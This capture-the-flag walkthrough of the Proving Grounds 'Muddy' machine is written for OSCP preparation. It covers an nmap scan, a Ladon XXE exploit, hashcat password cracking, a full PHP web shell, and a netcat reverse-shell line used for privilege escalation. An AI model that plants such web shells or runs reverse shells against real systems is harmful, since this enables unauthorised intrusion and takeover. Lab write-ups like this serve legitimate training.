Proving grounds:Muddy
Today we will take a look at Proving grounds: Muddy. My purpose in sharing this post is to prepare for oscp exam. It is also to show you the way if you are in trouble. Please try to understand each step and take notes.
- Network scan
└─# nmap -Pn -p- -sS — min-rate 10000 192.168.168.161
Starting Nmap 7.92 ( https://nmap.org ) at 2022–12–04 09:43 EST
Warning: 192.168.168.161 giving up on port because retransmission cap hit (10).
Stats: 0:00:22 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 77.60% done; ETC: 09:43 (0:00:07 remaining)
Nmap scan report for 192.168.168.161
Host is up (0.092s latency).
Not shown: 59594 closed tcp ports (reset), 5936 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
25/tcp open smtp
80/tcp open http
111/tcp open rpcbind
8888/tcp open sun-answerbook- Apache
Add the IP address to the /etc/hosts file
└─# cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
192.168.168.161 muddy.ugc
- WSGIServer 0.1
After checking the service name, we see that it has an exploit.
─# searchsploit Ladon
— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — -
Exploit Title | Path
— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — -
Ladon Framework for Python 0.9.40 — XML External Entity Expansion | xml/webapps/43113.txt
— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — -
Shellcodes: No Results
┌──(root㉿kali)-[~/ctf/muddy]
└─# searchsploit -m xml/webapps/43113.txt
Exploit: Ladon Framework for Python 0.9.40 — XML External Entity Expansion
URL: https://www.exploit-db.com/exploits/43113
Path: /usr/share/exploitdb/exploits/xml/webapps/43113.txt
File Type: Python script, ASCII text executable
Copied to: /root/ctf/muddy/43113.txtI will use burpsuite here. You will need to change the method names in the payload. You can see it on the website.
Webdav
During the directory scan, webdav appeared. When browsing the site, a username and password are required.
I searched the internet to see where I could get the password. Result:
Crack the password
Hashcat
hashcat.exe -m 1600 -a 0 passwd.txt rockyou.txt
Let’s upload webshell using username and password.
Webshell
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
if(isset($_GET['cmd']))
{
system($_GET['cmd']);
}
?>
</pre>
</body>
</html>
Reverse shell
Linpeas
Here it is placed in a folder that we can write to. So let’s change it and put some malicious code here.
www-data@muddy:/dev/shm$ echo “nc 192.168.49.168 4444 -e /bin/bash” > netstat
www-data@muddy:/dev/shm$ chmod 777 netstat
And now we are the root
“If you have any questions or comments, please do not hesitate to write. Have a good days”
